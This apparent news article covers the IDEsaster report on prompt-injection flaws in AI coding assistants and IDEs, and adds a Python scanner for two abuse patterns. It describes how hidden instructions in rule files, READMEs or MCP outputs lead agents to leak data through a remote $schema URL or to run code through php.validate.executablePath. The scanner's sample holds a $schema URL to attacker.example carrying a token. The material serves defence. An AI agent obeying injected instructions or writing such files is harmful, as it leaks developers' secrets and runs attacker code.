IDEsaster: Critical AI Tool Flaws Enable Data Theft and Remote Hacks

Overview of the IDEsaster Research Report

A six-month investigation into AI-assisted development tools has revealed over thirty security vulnerabilities that allow data exfiltration and, in some cases, remote code execution. The findings, outlined in the IDEsaster research report, highlight how AI agents embedded in integrated development environments (IDEs) such as Visual Studio Code, JetBrains products, Zed, and numerous commercial assistants can be manipulated to leak sensitive information or execute attacker-controlled code.

According to the research, 100% of tested AI IDEs and coding assistants were found to be vulnerable. Affected products include GitHub Copilot, Cursor, Windsurf, Kiro.dev, Zed.dev, Roo Code, Junie, Cline, Gemini CLI, and Claude Code. At least twenty-four of these have been assigned Common Vulnerabilities and Exposures (CVEs), with additional advisories from AWS.

Core Issues in AI-Integrated IDEs

The core issue stems from how AI agents interact with long-standing IDE features. These editors were never designed for autonomous components capable of reading, editing, and generating files. When AI assistants gained these abilities, previously benign features became potential attack surfaces.

“All AI IDEs... effectively ignore the base software... in their threat model. They treat their features as inherently safe because they've been there for years. However, once you add AI agents that can act autonomously, the same features can be weaponized into data exfiltration and RCE primitives,” said security researcher Ari Marzouk, speaking to The Hacker News.

Attack Chain and Vulnerability Examples

The research report describes an IDE-agnostic attack chain that begins with context hijacking via prompt injection. Hidden instructions can be planted in rule files, READMEs, file names, or outputs from malicious MCP servers. Once an agent processes that context, its tools can be directed to perform legitimate actions that trigger unsafe behaviors in the base IDE. The final stage abuses built-in features to extract data or execute attacker code across any AI IDE sharing that base software layer.

One documented example involves writing a JSON file whose $schema field points to a remote URL. The IDE fetches that schema automatically, so anything the agent embedded in the URL, including sensitive data collected earlier in the chain, is sent to the attacker-controlled server. Visual Studio Code, JetBrains IDEs, and Zed all exhibited this behavior, and developer safeguards such as diff previews did not suppress the outbound request.

Another case study demonstrates full remote code execution through manipulated IDE settings. The agent is first steered into modifying an executable file that already exists in the workspace, then into pointing a configuration field such as php.validate.executablePath at it; the IDE runs that binary immediately the moment a file of the related type (here, PHP) is opened or created. JetBrains tools show similar exposure through workspace metadata.
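The two feature abuses described above (a remote $schema reference that triggers an outbound fetch, and an executable-path setting pointed at a file inside the workspace) are both things an agent can introduce with an ordinary file write, so a practitioner wants a check that runs over a workspace before the IDE acts on those files. The scanner below is an added example written for this page; it is not code from the IDEsaster report or from any IDE vendor. The schema host allowlist, the regex that generalizes from php.validate.executablePath to other "executablePath"-style keys, and the sample JSON and settings documents are all assumptions constructed for the example.

```python
"""Workspace scanner for two IDE-feature abuse patterns: remote $schema
fetches and executable-path settings that point inside the workspace."""
import json
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Hosts that legitimately serve JSON schemas. Assumption for this example;
# a real deployment would tune this to its own policy.
SCHEMA_HOST_ALLOWLIST = {"json.schemastore.org", "json-schema.org"}

# Setting keys that make the IDE launch a binary. php.validate.executablePath
# is the one the report names; matching any key that ends in "executablePath"
# or ".path" is a heuristic assumption, not something the report states.
import re
EXEC_KEY_RE = re.compile(r"(?i)(executablePath|\.path)$")

# Constructed samples (not taken from the report) mirroring the two cases.
SAMPLE_JSON = {
    "$schema": "https://attacker.example/schema.json?token=example-secret-value",
    "name": "demo",
}
SAMPLE_SETTINGS = {
    "php.validate.executablePath": "./tools/php",
    "php.validate.enable": True,
    "editor.tabSize": 2,
}


def _walk_json(obj, path=()):
    """Yield (key_path, value) for every leaf in a parsed JSON document."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            yield from _walk_json(v, path + (k,))
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            yield from _walk_json(v, path + (str(i),))
    else:
        yield path, obj


def check_schema_refs(doc, allowlist=SCHEMA_HOST_ALLOWLIST):
    """Flag $schema values that would cause the IDE to fetch a remote URL."""
    findings = []
    for key_path, value in _walk_json(doc):
        if not key_path or key_path[-1] != "$schema" or not isinstance(value, str):
            continue
        url = urlparse(value)
        if url.scheme not in ("http", "https"):
            continue  # local or relative schema paths do not trigger a fetch
        key = ".".join(key_path)
        if url.hostname not in allowlist:
            findings.append(("remote-schema-unknown-host", key, value))
        elif url.query:
            # Even a trusted host can carry exfiltrated data in the query string
            findings.append(("remote-schema-has-query", key, value))
    return findings


def check_exec_settings(settings, workspace_root):
    """Flag executable-path settings that resolve to a file inside the workspace."""
    root = Path(workspace_root).resolve()
    findings = []
    for key_path, value in _walk_json(settings):
        key = ".".join(key_path)
        if not EXEC_KEY_RE.search(key) or not isinstance(value, str):
            continue
        candidate = Path(value)
        if not candidate.is_absolute():
            candidate = root / candidate  # assume relative paths are workspace-relative
        try:
            candidate.resolve().relative_to(root)
        except ValueError:
            continue  # points outside the workspace: not the pattern we are after
        findings.append(("exec-path-inside-workspace", key, value))
    return findings


def scan_workspace(workspace_root):
    """Run the $schema check on every .json file and the exec-path check on
    .vscode/settings.json. Note: settings.json may contain comments (JSONC);
    this example uses the plain json module and skips files it cannot parse."""
    root = Path(workspace_root)
    findings = []
    for p in root.rglob("*.json"):
        try:
            doc = json.loads(p.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        rel = str(p.relative_to(root))
        findings += [(rel,) + f for f in check_schema_refs(doc)]
        if p.name == "settings.json" and p.parent.name == ".vscode":
            findings += [(rel,) + f for f in check_exec_settings(doc, root)]
    return findings


def scan_demo_workspace():
    """Build a throwaway workspace from the constructed samples and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / ".vscode").mkdir()
        (root / ".vscode" / "settings.json").write_text(json.dumps(SAMPLE_SETTINGS))
        (root / "config.json").write_text(json.dumps(SAMPLE_JSON))
        return scan_workspace(root)


if __name__ == "__main__":
    for finding in scan_demo_workspace():
        print(finding)
```

The check is intentionally pre-emptive: it inspects files as written rather than waiting for the IDE to act on them, because the report's point is that the IDE performs the fetch or the execution on its own once the file exists. Running it as a pre-commit hook or after each agent turn catches the write before the base software layer reacts to it.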

Recommendations and Long-Term Fixes

The report concludes that in the short term, the vulnerability class cannot be eliminated because current IDEs were not built under what the researcher calls the “Secure for AI” principle. Mitigations exist for both developers and tool vendors, but the long-term fix requires fundamentally redesigning how IDEs allow AI agents to read, write, and act inside projects.

Key Takeaways

  • All AI IDEs Tested Are Vulnerable: The research found that every AI-powered IDE tested had exploitable vulnerabilities.
  • Attack Vectors Are Diverse: From context hijacking to manipulating settings, attackers can exploit multiple points of entry.
  • Need for Secure Design Principles: The report emphasizes the importance of rethinking how IDEs are designed to accommodate AI agents securely.
  • Mitigations Exist, But Long-Term Changes Are Needed: Developers and vendors can implement temporary fixes, but a fundamental redesign of IDE architecture is necessary for lasting security.
